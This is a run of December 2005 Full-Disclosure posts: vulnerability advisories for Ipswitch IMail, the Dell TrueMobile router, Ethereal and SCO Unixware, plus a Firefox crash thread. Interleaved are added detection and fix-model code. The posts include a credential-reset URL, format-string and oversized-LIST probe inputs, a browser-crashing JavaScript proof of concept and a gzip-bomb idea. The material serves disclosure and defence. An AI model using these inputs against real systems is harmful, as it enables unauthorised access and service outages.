
III. ANALYSIS

Successful exploitation of the format string vulnerability allows
unauthenticated remote attackers to execute arbitrary code. Ipswitch
mail services are commonly configured to allow untrusted access. The
use of a firewall or other mitigating strategy is highly recommended
due to the nature of this vulnerability. The IMail SMTP server is
installed by default.

IV. DETECTION

iDEFENSE Labs has confirmed the existence of this vulnerability in
Ipswitch Collaboration Suite 8.20.

V. WORKAROUND

iDEFENSE is currently unaware of any effective workarounds for this
issue. Access to the affected host should be filtered at the network
boundary if global accessibility is not required. Restricting access to
only trusted hosts and networks may reduce the likelihood of
exploitation.

VI. VENDOR RESPONSE

Ipswitch Collaboration Suite 2.02 has been released to address this
issue and is available for download at:

 http://www.ipswitch.com/support/ics/updates/ics202.asp

IMail Server 8.22  has been released to address this issue and is
available for download at:

 
http://www.ipswitch.com/support/imail/releases/imail_professional/im822.asp


VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-2931 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

09/08/2005  Initial vendor notification
09/13/2005  Initial vendor response
10/06/2005  Coordinated public disclosure

IX. CREDIT

iDEFENSE credits Nico with the discovery of this vulnerability.



[Full-disclosure] iDEFENSE Security Advisory 12.06.05: Ipswitch IMail IMAP List Command DoS Vulnerability

2005-12-06 Thread [EMAIL PROTECTED]

Ipswitch IMail IMAP List Command DoS Vulnerability

iDEFENSE Security Advisory 12.06.05
www.idefense.com/application/poi/display?id=347&type=vulnerabilities
December 6, 2005

I. BACKGROUND

Ipswitch IMail Server is an email server that is part of the Ipswitch
Collaboration Suite. IMail supports POP3, SMTP, IMAP and web-based email
access. More information can be located on the vendor's site at:

http://www.ipswitch.com/Products/collaboration/index.html

II. DESCRIPTION

Remote exploitation of a denial of service (DoS) vulnerability in
Ipswitch Inc.'s Imail IMAP server allows attackers to crash the target
service, thereby preventing legitimate use.

The problem specifically exists in handling long arguments to the LIST
command. When a LIST command of approximately 8000 bytes is supplied,
internal string parsing routines can be manipulated in such a way as to
reference non-allocated sections of memory. This parsing error results
in an unhandled access violation, forcing the daemon to exit.

III. ANALYSIS

Exploitation allows remote attackers to crash vulnerable IMAP servers
and thereby prevent legitimate usage. The LIST command is only available
post authentication and therefore valid credentials are required to
exploit this vulnerability.
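
As an added detection example (not Ipswitch code, and not from either advisory), the following Python scans captured client-side SMTP and IMAP command lines for the two input patterns these advisories describe: printf-style conversion specifiers in EXPN, MAIL FROM and RCPT TO arguments (the Collaboration Suite SMTP format string issue above) and LIST arguments long enough to approach the roughly 8000-byte crash size described here. The session captures are constructed; the 4096-byte alert threshold and the "any %n, or three or more specifiers" rule are choices made for this example, not values from the advisories.

```python
"""Detection logic for the two Ipswitch mail issues.  Added example; not
vendor code.  The session lines below are constructed, not real captures."""

import re

SMTP_SESSION = [
    "EHLO client.example.test",
    "MAIL FROM:<bob@example.test>",
    "RCPT TO:<alice@example.test>",
    "MAIL FROM:<%x%x%x%x%n@example.test>",     # classic format-string probe
    "RCPT TO:<sales%40example.test>",           # lone escape, benign
    "EXPN %08x.%08x.%n",
]

IMAP_SESSION = [
    "a1 LOGIN user1 secret",
    'a2 LIST "" "*"',
    'a3 LIST "" "' + "A" * 8000 + '"',          # ~8000-byte argument, per advisory
]

# A C printf conversion: %[argpos$][flags][width][.prec][length]conv
_FMT_SPEC = re.compile(
    r"%(?:\d+\$)?[-+ #0]*\d*(?:\.\d+)?(?:hh|h|ll|l|L|q|j|z|t)?[diouxXeEfFgGaAcspn]"
)
SMTP_VERBS = {"EXPN", "MAIL", "RCPT"}
LIST_ARG_THRESHOLD = 4096     # chosen for this example; the advisory cites ~8000


def format_specs(text):
    """Every printf-style conversion found in the text, in order."""
    return _FMT_SPEC.findall(text)


def looks_like_format_probe(specs):
    """%n is never legitimate in a mail address; several %x/%s in a row are
    the usual stack-walking probe.  A single '%40e'-style escape is not."""
    return any(s.endswith("n") for s in specs) or len(specs) >= 3


def smtp_format_string_hits(lines):
    """(line, specs) for EXPN/MAIL/RCPT commands carrying a format probe."""
    hits = []
    for line in lines:
        verb = line.split(None, 1)[0].upper() if line.strip() else ""
        if verb in SMTP_VERBS:
            specs = format_specs(line)
            if looks_like_format_probe(specs):
                hits.append((line, specs))
    return hits


def imap_long_list_hits(lines, threshold=LIST_ARG_THRESHOLD):
    """(tag, argument length) for LIST commands at or above the threshold."""
    hits = []
    for line in lines:
        parts = line.split(None, 2)           # tag, command, argument string
        if len(parts) >= 2 and parts[1].upper() == "LIST":
            args = parts[2] if len(parts) == 3 else ""
            if len(args) >= threshold:
                hits.append((parts[0], len(args)))
    return hits


if __name__ == "__main__":
    for line, specs in smtp_format_string_hits(SMTP_SESSION):
        print("SMTP format probe:", line, specs)
    for tag, length in imap_long_list_hits(IMAP_SESSION):
        print(f"IMAP oversized LIST: tag={tag} argument={length} bytes")
```

Both checks look only at the command lines, so they can run on a capture or a proxy log; the IMAP check fires only after LOGIN, which matches the advisory's note that valid credentials are required.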

IV. DETECTION

iDEFENSE has confirmed the existence of this vulnerability in Ipswitch
IMail 8.2.

V. WORKAROUND

As this vulnerability is exploited after authentication occurs, ensuring
that only trusted users have accounts can mitigate the risk somewhat. As
a more effective workaround, consider limiting access to the IMAP server
by filtering TCP port 143. If possible, consider disabling IMAP and
forcing users to use POP3.

VI. VENDOR RESPONSE

Ipswitch Collaboration Suite 2.02 has been released to address this
issue and is available for download at:

http://www.ipswitch.com/support/ics/updates/ics202.asp

IMail Server 8.22 Patch has been released to address this issue and is
available for download at:

http://www.ipswitch.com/support/imail/releases/imail_professional/im822.asp

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-2923 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

09/08/2005 Initial vendor notification
09/13/2005 Initial vendor response
10/06/2005 Coordinated public disclosure

IX. CREDIT

Sebastian Apelt is credited with discovering this vulnerability.



Re: [Full-disclosure] Re: Google is vulnerable from XSS attack

2005-12-07 Thread [EMAIL PROTECTED]

where is your heap overflow ?? (XSS easy targets) ;>

n3td3v wrote:
> Hackers own Google while vulnerabilities remain unpatched. Once they
> patch a vulnerability, they can own me again! Until then... Google is
> in the hands of hackers.
> 
> Since you're having a stab at me. Where's your Google and Yahoo
> vulnerabilities? Naw, you don't have any. You prefer to go looking for
> your SQL injections and cross site scripting in web sites no one has
> ever heard of or cared about before (easy targets).
> 
> As the score goes, how many high profile brand names have you found
> vulnerabilities for?
> 
> Fancy having a hacking challenge for finding vulnerabilities in major
> dot-coms?
> 
> Let's do it!
> 
> On 12/7/05, Morning Wood <[EMAIL PROTECTED]> wrote:
> 
>>who owns you? hint: Google ( they own the world )
> 


[Full-disclosure] iDefense Security Advisory 12.07.05: Dell TrueMobile 2300 Wireless Broadband Router Authentication Bypass Vulnerability

2005-12-07 Thread [EMAIL PROTECTED]
Dell TrueMobile 2300 Wireless Broadband Router Authentication Bypass Vulnerability


iDefense Security Advisory 12.07.05
www.idefense.com/application/poi/display?id=348&type=vulnerabilities
December 7, 2005

I. BACKGROUND

The Dell TrueMobile 2300 Wireless Broadband Router is an 802.11b/g
wireless access point, wired ethernet switch and internet router. More
information can be found at the following URL:

http://support.dell.com/support/edocs/network/p57205/en/intro/index.htm

II. DESCRIPTION

Remote exploitation of a design error in Dell Inc.'s TrueMobile 2300
Wireless Router may allow an attacker to reset the authentication
credentials.

The Dell TrueMobile 2300 is a wireless router and access point. By
requesting the following URL from the router, it is possible to obtain
a page containing a form which allows the authentication credentials to
be reset. (The IP is typically 192.168.2.1, and [ROUTER IP] should be
replaced by the router's actual address.)

http://[ROUTER IP]/apply.cgi?Page=adv_password.asp&action=ClearLog

Although dialog boxes for entering the username and password appear,
pressing cancel will not prevent this exploit from working.

III. ANALYSIS

Exploitation could allow remote attackers to associate with the
internal side of the router to change any configuration settings,
including uploading of new firmware.

The precise cause of the error is unknown. Although there is GPL
source code available for this product, the firmware's source code
version has not been kept up to date with the binary version. As a
result, it does not directly allow the cause of the vulnerability to
be determined.

Based on analysis of the affected binary, /usr/sbin/httpd, and the
previous version of the source code it appears the cause is a logic
error involving the 'ClearLog' string being checked without first
ascertaining that the page was one where that made sense. Although
the binary appears to be largely the same code as the available source
code, there are many differences. In the binary version, the
authentication is not performed in the same order as in the source
version. It is likely that the determination of which pages to check
is now done on the basis of the 'action' variable, rather than the
previous method of using the page name.
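The ordering the analysis above suspects, as an added example that is not the router's httpd code: a small C model of a CGI dispatcher that recognises the 'ClearLog' action before deciding whether the requested page needs credentials, beside the ordering that keys the decision on the page itself. The privileged-page list, the 'log.asp' name, the query parser and the status codes are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define MAX_PARAM 64

/* Pull the Page and action values out of a query string such as
 * "Page=adv_password.asp&action=ClearLog". Missing parameters come back
 * as empty strings; over-long input is rejected with -1. */
int parse_query(const char *query, char *page, char *action)
{
    char buf[256];
    char *tok;
    page[0] = action[0] = '\0';
    if (query == NULL || strlen(query) >= sizeof buf)
        return -1;
    strcpy(buf, query);
    for (tok = strtok(buf, "&"); tok != NULL; tok = strtok(NULL, "&")) {
        char *eq = strchr(tok, '=');
        if (eq == NULL)
            continue;
        *eq = '\0';
        if (strlen(eq + 1) >= MAX_PARAM)
            return -1;
        if (strcmp(tok, "Page") == 0)
            strcpy(page, eq + 1);
        else if (strcmp(tok, "action") == 0)
            strcpy(action, eq + 1);
    }
    return 0;
}

/* Pages that must never be served without credentials (assumed list; the
 * advisory itself names only adv_password.asp). */
static const char *PRIVILEGED_PAGES[] = { "adv_password.asp", "upgrade.asp", NULL };

int page_requires_auth(const char *page)
{
    int i;
    for (i = 0; PRIVILEGED_PAGES[i] != NULL; i++)
        if (strcmp(page, PRIVILEGED_PAGES[i]) == 0)
            return 1;
    return 0;
}

/* Suspected vulnerable ordering: the handler recognises action=ClearLog
 * and services the request before asking whether the page needs a login,
 * so the credential-reset form comes back to anyone. Returns an
 * HTTP-style status code. */
int serve_action_first(const char *query, int authenticated)
{
    char page[MAX_PARAM], action[MAX_PARAM];
    if (parse_query(query, page, action) != 0)
        return 400;
    if (strcmp(action, "ClearLog") == 0)
        return 200;                   /* authentication never consulted */
    if (page_requires_auth(page) && !authenticated)
        return 401;
    return 200;
}

/* Hardened ordering: the decision is keyed on the resource (the page),
 * and only afterwards is the action checked against what that page
 * supports. "log.asp" is an assumed name for the one page ClearLog
 * belongs to. */
int serve_page_first(const char *query, int authenticated)
{
    char page[MAX_PARAM], action[MAX_PARAM];
    if (parse_query(query, page, action) != 0)
        return 400;
    if (page_requires_auth(page) && !authenticated)
        return 401;
    if (strcmp(action, "ClearLog") == 0 && strcmp(page, "log.asp") != 0)
        return 400;                   /* action does not belong to page */
    return 200;
}

int main(void)
{
    const char *q = "Page=adv_password.asp&action=ClearLog";
    printf("action-first, no credentials: %d\n", serve_action_first(q, 0));
    printf("page-first,   no credentials: %d\n", serve_page_first(q, 0));
    return 0;
}
```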

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in the
following Dell TrueMobile 2300 firmware versions:

• 3.0.0.8, dated 07/24/2003
• 5.1.1.6, dated 1/31/2004

Previous firmware versions may also be affected; however, it is not
clear in which version the vulnerability was introduced.

V. WORKAROUND

In order to mitigate exposure to this vulnerability from remote
attackers, employ encryption on your wireless interface, or disable it
if it is not required. The exact settings to use are dependent on your
wireless security policy. This workaround does not prevent exploitation
from the local network via wired interfaces.

VI. VENDOR RESPONSE

"The vendor is no longer selling this product and has replaced it with
newer models that do not exhibit the defect. Therefore, a patch will not
be released to address this issue."

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2005-3661 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

11/17/2005 Initial vendor notification
11/18/2005 Initial vendor response
12/07/2005 Public disclosure

IX. CREDIT

TNull is credited with the discovery of this vulnerability.

Get paid for vulnerability research
http://www.iDefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.iDefense.com

X. LEGAL NOTICES

Copyright © 2005 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.



[Full-disclosure] re: Firefox 1.5 buffer overflow (poc)

2005-12-08 Thread [EMAIL PROTECTED]

nor a fake, nor you really don't know what is a buffer overflow, but for
sure here on my firefox 1.5 EN, the client is much longer to load to
the next boot but it reloads fine without exceptions and there is
nothing about a security bug here...


>which
>most users won't figure out.
>
>this proof of concept will only prevent someone from reopening
>their browser after being exploited. DoS if you will. however, code
>execution is possible with some modifcations.
>
>Tested with Firefox 1.5 on Windows XP SP2.
>
>ZIPLOCK <[EMAIL PROTECTED]>
>
>-->
>heh
>function ex() {
>   var buffer = "";
>   for (var i = 0; i < 5000; i++) {
>   buffer += "A";
>   }
>   var buffer2 = buffer;
>   for (i = 0; i < 500; i++) {
>   buffer2 += buffer;
>   }
>   document.title = buffer2;
>}
>ZIPLOCK says CLICK ME
>


re: [Full-disclosure] 0-day for sale on ebay

2005-12-09 Thread [EMAIL PROTECTED]

this has been quickly removed hehe..

"Invalid Item
This listing (7203336538) has been removed by eBay or is no longer
available. Please make sure that you've entered the item number correctly.
If the item was removed by eBay, please consider this transaction
canceled. If anybody contacts you to complete the sale, please ignore
the request. Completing the sale outside of eBay may be unsafe and will
not be covered by eBay purchase protection programs."


Re: [Full-disclosure] 0-day for sale on ebay

2005-12-09 Thread [EMAIL PROTECTED]

here ya go:  http://heapoverflow.com/ebay_joke.htm  :>

shiz puss wrote:
> anybody have a screenshot for those of us that missed it?
> 
> */"[EMAIL PROTECTED]" <[EMAIL PROTECTED]>/* wrote:
> 
> this has been quickly removed hehe..
> 
> "Invalid Item
> This listing (7203336538) has been removed by eBay or is no longer
> available. Please make sure that you've entered the item number
> correctly.
> If the item was removed by eBay, please consider this transaction
> canceled. If anybody contacts you to complete the sale, please ignore
> the request. Completing the sale outside of eBay may be unsafe and will
> not be covered by eBay purchase protection programs."


[Full-disclosure] iDefense Security Advisory 12.09.05: Ethereal OSPF Protocol Dissector Buffer Overflow Vulnerability

2005-12-09 Thread [EMAIL PROTECTED]

Ethereal OSPF Protocol Dissector Buffer Overflow Vulnerability

iDefense Security Advisory 12.09.05
www.idefense.com/application/poi/display?id=349&type=vulnerabilities
December 9, 2005

I. BACKGROUND

Ethereal is a full featured open source network protocol analyzer.

For more information, see http://www.ethereal.com/

II. DESCRIPTION

Remote exploitation of an input validation vulnerability in the OSPF
protocol dissectors within Ethereal, as included in various vendors'
operating system distributions, could allow attackers to crash the
vulnerable process or potentially execute arbitrary code.

The affected Ethereal component is used to analyse the Open Shortest
Path First (OSPF) Interior Gateway Protocol (IGP), as specified in
RFC 2178.

The vulnerability specifically exists due to no bounds checking being
performed in the dissect_ospf_v3_address_prefix() function. This
function takes user-supplied binary data and attempts to convert it into
a human readable string. This function uses a fixed length buffer on
the stack to store the constructed string but performs no checks on the
length of the input. If the generated output length from the input
exceeds the size of the buffer, a stack-based overflow occurs.
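The bug class described above, as an added C example that is not Ethereal's dissector code: a prefix formatter that writes hex into a fixed stack buffer with no bound, beside a bounded version that validates the prefix-length field against the IPv6 maximum and the bytes actually present before formatting anything. Function names, the 64-byte buffer and the simplified one-byte-length layout are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define IPV6_MAX_PREFIX_BITS 128
#define PREFIX_STR_LEN 64   /* assumed size of the fixed stack buffer */

/* Validate the prefix-length field before trusting it: an IPv6 prefix is
 * at most 128 bits, and the packet must actually carry the bytes it
 * implies. Returns the prefix size in bytes, or -1 if either check fails. */
int prefix_byte_count(unsigned prefix_len_bits, size_t bytes_remaining)
{
    size_t n;
    if (prefix_len_bits > IPV6_MAX_PREFIX_BITS)
        return -1;
    n = (prefix_len_bits + 7) / 8;
    if (n > bytes_remaining)
        return -1;
    return (int)n;
}

/* Unchecked pattern the advisory describes: every input byte appends up
 * to three characters ("xx:") and nothing stops the write at the end of
 * the caller's buffer. Kept for contrast only; nothing here calls it. */
void format_prefix_unchecked(const unsigned char *data, size_t len, char *out)
{
    char *p = out;
    size_t i;
    *p = '\0';
    for (i = 0; i < len; i++)
        p += sprintf(p, "%02x%s", data[i], (i + 1 < len) ? ":" : "");
}

/* Bounded replacement: track the space left and refuse the whole element
 * (return -1, empty string) instead of overrunning or silently
 * truncating. Returns the number of characters written on success. */
int format_prefix_bounded(const unsigned char *data, size_t len,
                          char *out, size_t out_size)
{
    size_t used = 0, i;
    if (out_size == 0)
        return -1;
    out[0] = '\0';
    for (i = 0; i < len; i++) {
        int n = snprintf(out + used, out_size - used, "%02x%s",
                         data[i], (i + 1 < len) ? ":" : "");
        if (n < 0 || (size_t)n >= out_size - used) {
            out[0] = '\0';  /* do not leave a half-written string behind */
            return -1;
        }
        used += (size_t)n;
    }
    return (int)used;
}

/* Dissect one address prefix at pkt[offset]. Assumed simplified layout: a
 * one-byte prefix length in bits immediately followed by the prefix
 * bytes. The text is built in a fixed stack buffer, as in the advisory,
 * but only after both length checks pass. Returns the number of prefix
 * bytes consumed, or -1 for a malformed prefix. */
int dissect_v3_prefix(const unsigned char *pkt, size_t pkt_len, size_t offset,
                      char *text, size_t text_size)
{
    char buf[PREFIX_STR_LEN];
    int nbytes;
    if (offset >= pkt_len)
        return -1;
    nbytes = prefix_byte_count(pkt[offset], pkt_len - offset - 1);
    if (nbytes < 0)
        return -1;
    if (format_prefix_bounded(pkt + offset + 1, (size_t)nbytes,
                              buf, sizeof buf) < 0)
        return -1;
    snprintf(text, text_size, "%s", buf);
    return nbytes;
}

int main(void)
{
    /* Constructed samples: a legal 32-bit prefix (2001:db8::/32) and a
     * 255-bit prefix of the kind a crafted packet could advertise. */
    const unsigned char good[] = { 32, 0x20, 0x01, 0x0d, 0xb8 };
    const unsigned char bad[]  = { 255, 0xaa, 0xaa, 0xaa };
    char text[PREFIX_STR_LEN];
    int n = dissect_v3_prefix(good, sizeof good, 0, text, sizeof text);
    printf("good: %d bytes, \"%s\"\n", n, text);
    n = dissect_v3_prefix(bad, sizeof bad, 0, text, sizeof text);
    printf("bad:  %d (rejected)\n", n);
    return 0;
}
```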

III. ANALYSIS

Successful exploitation allows remote attackers to perform a DoS against
a running instance of Ethereal and may, under certain conditions,
potentially allow the execution of arbitrary code. As the overflow
string is generated from a format string converting binary values into
their hexadecimal (base 16) equivalent characters, it can contain only a
limited subset of all possible characters, and the length of an
overflow can only be controlled to within three characters. This may
prevent exploitability on some platforms; however, these constraints
may not prevent exploitation on others.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in the
ethereal-0.10.12 RPM from Red Hat Fedora Core 3. It is suspected that
previous versions containing the OSPF dissector code are also
vulnerable.

V. WORKAROUND

Disable the OSPF packet dissector in Ethereal by performing the
following actions as the user invoking Ethereal, typically root.

Create the .ethereal directory:

# mkdir ~/.ethereal

You can safely ignore the following error:

mkdir: cannot create directory '/root/.ethereal': File exists

Add the OSPF dissector to the list of protocols to ignore.

# echo ospf >> ~/.ethereal/disabled_protos

This workaround will prevent Ethereal from parsing the contents of OSPF
packets, which prevents exposure to the vulnerability.

VI. VENDOR RESPONSE

A source patch is available from the main ethereal SVN Repository:

http://anonsvn.ethereal.com/viewcvs/viewcvs.py/trunk/epan/dissectors/packet-ospf.c?rev=16507&view=markup

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2005-3651 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

11/14/2005 Initial vendor notification
11/14/2005 Initial vendor response
12/09/2005 Public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.iDefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.iDefense.com

X. LEGAL NOTICES

Copyright © 2005 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.


Re: [Full-disclosure] Firefox 1.5 buffer overflow (poc) - more buffer "overflows" waiting to be discovered

2005-12-10 Thread [EMAIL PROTECTED]

have 2,5Gb DDR2 ram and nothing happen here, it loads during 1 min, then
all is fine.. I guess the sploit coder had 64 Mb edo :D :D

Fósforo wrote:
> It works here.
> 
> seems it depends on how much ram you've. i got 2 blue screens, after
> changed the code a bit. the first one was about MEMORY_MANAGEMENT and
> the second one was a PAGE_FAULT_IN_NONPAGED_AREA. And both occurs
> without user interaction, the second one i just've opened firefox, not
> the bug file (maybe cache ?)
> 
> ps: i've 1Gb of ram
> 
> heh
> function ex() {
>var buffer = "";
>for (var i = 0; i < 5000; i++) {
>buffer += "A";
>}
>var buffer2 = buffer;
>var buffer3 = buffer2;
>for (i = 0; i < 500; i++) {
>buffer2 += buffer;
>for (i = 0; i < 500; i++) {
> buffer3 += buffer2;
>    }
>}
>document.title = buffer2;
> }
> ZIPLOCK says CLICK ME
> 
> 
> 
> 
> 2006/1/31, ezdy <[EMAIL PROTECTED]>:
> 
>>and theres no reason for it to be working.
>>first let's see what's going on - i loaded provided html in firefox
>>and quitted it.
>>even quitting firefox took a while, but only slightly longer than usual.
>>after starting firefox again, it indeed didn't load, stuck in some
>>kind of disk loop ignoring all macosx ui events.
>>but not swapping. alright, that's strange:
>>
>>[EMAIL PROTECTED]:~/Desktop/Firefox.app/Contents/MacOS$ ktrace ./firefox-
>>bin
>>[EMAIL PROTECTED]:~/Desktop/Firefox.app/Contents/MacOS$ kdump -m 1 |
>>tail -100
>>...
>>  7616 firefox-bin CALL  read(0x18,0xcad9e00,0x1000)
>>  7616 firefox-bin GIO   fd 24 read 4096 bytes
>>   "0"
>>  7616 firefox-bin RET   read 4096/0x1000
>>  7616 firefox-bin CALL  read(0x18,0xcad9e00,0x1000)
>>  7616 firefox-bin GIO   fd 24 read 4096 bytes
>>   "0"
>>  7616 firefox-bin RET   read 4096/0x1000
>>  7616 firefox-bin CALL  lseek(0x18,0x21a000,0)
>>  7616 firefox-bin RET   lseek 0
>>  7616 firefox-bin CALL  read(0x18,0xcad9e00,0x1000)
>>  7616 firefox-bin GIO   fd 24 read 4096 bytes
>>   "0"
>>  7616 firefox-bin RET   read 4096/0x1000
>>  7616 firefox-bin CALL  read(0x18,0xcad9e00,0x1000)
>>  7616 firefox-bin GIO   fd 24 read 4096 bytes
>>   "\\"
>>  7616 firefox-bin RET   read 4096/0x1000
>>  7616 firefox-bin CALL  lseek(0x18,0x21c000,0)
>>  7616 firefox-bin RET   lseek 0
>>  7616 firefox-bin CALL  read(0x18,0xcad9e00,0x1000)
>>  7616 firefox-bin GIO   fd 24 read 4096 bytes
>>   "A"
>>  7616 firefox-bin RET   read 4096/0x1000
>>  7616 firefox-bin CALL  read(0x18,0xcad9e00,0x1000)
>>  7616 firefox-bin GIO   fd 24 read 4096 bytes
>>   "A"
>>  7616 firefox-bin RET   read 4096/0x1000
>>  7616 firefox-bin CALL  lseek(0x18,0x21e000,0)
>>  7616 firefox-bin RET   lseek 0
>>  7616 firefox-bin CALL  read(0x18,0xcad9e00,0x1000)
>>
>>this repeats virtually ad-infinitum until end of history.dat is reached.
>>note that there is never allocated any memory-the same buffer is
>>always used, thus no memory leak.
>>firefox is stuck in loop (and eventually starts, since the string is
>>finite, in my case
>>about 30M) but it took way too longer to load. im not a windows user
>>but since mac is only
>>step away from it (you know apple, let's take win95 and freebsd and
>>mix it together) my guess is
>>it is the same situation of keeping main thread busy and events
>>cannot be passed down, eventualy
>>leading to "application is not responding" killbox.
>>
>>for Z1PL0CK:
>>Don't stop, keep posting fake "buffer overflows" of #darknet
>>trademonkeys (this one actually looked funny in the beggining).
>>This time you made it to get /.ed which is not a bad start, but yo
>>gonna fly higher!
>>
>>Because this bug got killed, i've something better for you:
>>dd if=/dev/zero a 2GB file and gzip it. then just write a php script
>>which sets content-encoding: gzip and
>>fpassthru the file. safari rendered 1.2gb system unresponsible in 5
>>seconds, firefox in about 30. both crashed
>>on "overflows" like this:
>>
>>Safari(233,0xa000ed68) malloc: *** vm_allocate(size=125896)
>>failed (error code=3)
>>Safari(233,0xa000ed68) malloc: *** error: can't allocate region
>>Safari(233,0xa000ed68) malloc: ***

Re: [Full-disclosure] Standalone PC Lockdown

2005-12-10 Thread [EMAIL PROTECTED]

I think deep freeze is a good reference, a lot used in government/schools.

http://www.faronics.com/index.asp

Jesse Valentin wrote:
> Hello everyone,
>  
> Wanted to find out if anyone knew of a PC Lockdown program that could be
> used on a standalone machine? I'm planning to setup a machine running
> Windows XP Pro for a friend that wants to allow different people to use
> a machine for research purposes.
>  
> This machine is a standalone and I want to restrict certain programs and
> options on the Start menu from everyone except Admins. So far I've
> played with the services on the box, but any change I make to a service
> affects every user on the box. I really want to enforce software
> restrictions as well as operating system restrictions on the box but not
> sure how to do this without impacting the other users on the system.
>  
> Anyone know of any program that locks down the PC similar to what a bank
> does or machines that are used at kiosks in tradeshows?
>  
> Any suggestions would be appreciated.
>  
> Thanks -
>  
> JV


Re: [Full-disclosure] Standalone PC Lockdown

2005-12-10 Thread [EMAIL PROTECTED]

deep freeze isn't really something you can reproduce with your hands
like you say, it's much another security prevention in addition of your
registry things, which will restore your computer at every restart as
you configured it, this is like an ultimate prevention which most hackers
can't defeat, believe me :)


InfoSecBOFH wrote:
> You can in fact do everything that the software packages do yourself
> via registry keys and the local security policy.  Its a lot more work
> but would also save you a couple bucks.
> 
> Personally, I dont like paying for something I can just as easily do myself.


Re: [Full-disclosure] 0-day for sale on ebay

2005-12-10 Thread [EMAIL PROTECTED]

here is a possible debug screenshot of the bug

http://heapoverflow.com/excel-hot.jpg

I say "possible" and I hide debug info because I'm not sure if my
discovery is the same auctioned on ebay, it does at least some leet
flame ;>

Joel R. Helgeson wrote:
> Here's a full screen capture for those who missed it.
>  
> Joel
> 
> - Original Message -
> *From:* tmz99ar <mailto:[EMAIL PROTECTED]>
> *To:* full-disclosure@lists.grok.org.uk
> <mailto:full-disclosure@lists.grok.org.uk>
> *Sent:* Thursday, December 08, 2005 1:22 PM
> *Subject:* [Full-disclosure] 0-day for sale on ebay
> 
> http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=7203336538


Re: [Full-disclosure] McAfee VirusScan vs Metasploit Framework v2.x

2005-12-11 Thread [EMAIL PROTECTED]

I think most AV today detects any tool which can also be used by script
kiddies remotely, mine dfind is also detected by a lot (to note the
award winning pestpatrol's detection which find it with the md5 checksum
huhu)

Pavel Kankovsky wrote:
> On Sat, 10 Dec 2005, Debasis Mohanty wrote:
> 
> 
>>>From: H D Moore
>>>Looks like some overzealous idiot at McAfee added "Trojan" signatures for
>>>202 files in the latest version of the Metasploit Framework.
>>
>>Just for the info, they have also added Nmap as "potentially unwanted
>>application" (http://vil.mcafeesecurity.com/vil/content/v_100955.htm)
> 
> [...]
> 
> Are we making a list?
> You can add Symantec reporting a copy of Netcat as a "hacking tool".
> 
> --Pavel Kankovsky aka Peak  [ Boycott Microsoft--http://www.vcnet.com/bms ]
> "Resistance is futile. Open your source code and prepare for assimilation."
> 


[Full-disclosure] iDEFENSE Security Advisory 12.12.05: SCO Unixware Setuid 'uidadmin' Scheme Buffer Overflow Vulnerability

2005-12-12 Thread [EMAIL PROTECTED]

SCO Unixware Setuid 'uidadmin' Scheme Buffer Overflow Vulnerability

iDefense Security Advisory 12.12.05

www.iDefense.com/application/poi/display?id=350&type=vulnerabilities
December 12, 2005

I. BACKGROUND

SCO Unixware is a Unix operating system that runs on many OEM platforms.

II. DESCRIPTION

Local exploitation of a buffer overflow vulnerability in the uidadmin
binary included in multiple versions of The SCO Group Inc.'s Unixware
allows attackers to gain root privileges.

The vulnerability specifically exists because of a failure to check the
length of user specified file input. If the user prepares a file longer
than 1,600 bytes and supplies the path to that file using the "-S"
option of uidadmin, a stack based buffer overflow occurs. This leads to
the execution of arbitrary code with root privileges, as uidadmin is
setuid root by default.

III. ANALYSIS

Successful exploitation of this vulnerability requires that a user have
local access to the system. This would allow the user to gain super user
privileges.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in SCO
Unixware versions 7.1.3 and 7.1.4. All previous versions of SCO Unixware
are suspected to be vulnerable.

V. WORKAROUND

Remove the setuid bit from the uidadmin binary:

 chmod u-s /unixware/usr/bin/uidadmin

VI. VENDOR RESPONSE

The vendor has released the following update to address this
vulnerability:

 ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.54

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2005-3903 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

10/12/2005  Initial vendor notification
10/13/2005  Initial vendor response
12/12/2005  Coordinated public disclosure

IX. CREDIT

iDefense Labs is credited with the discovery of this vulnerability.

Get paid for vulnerability research
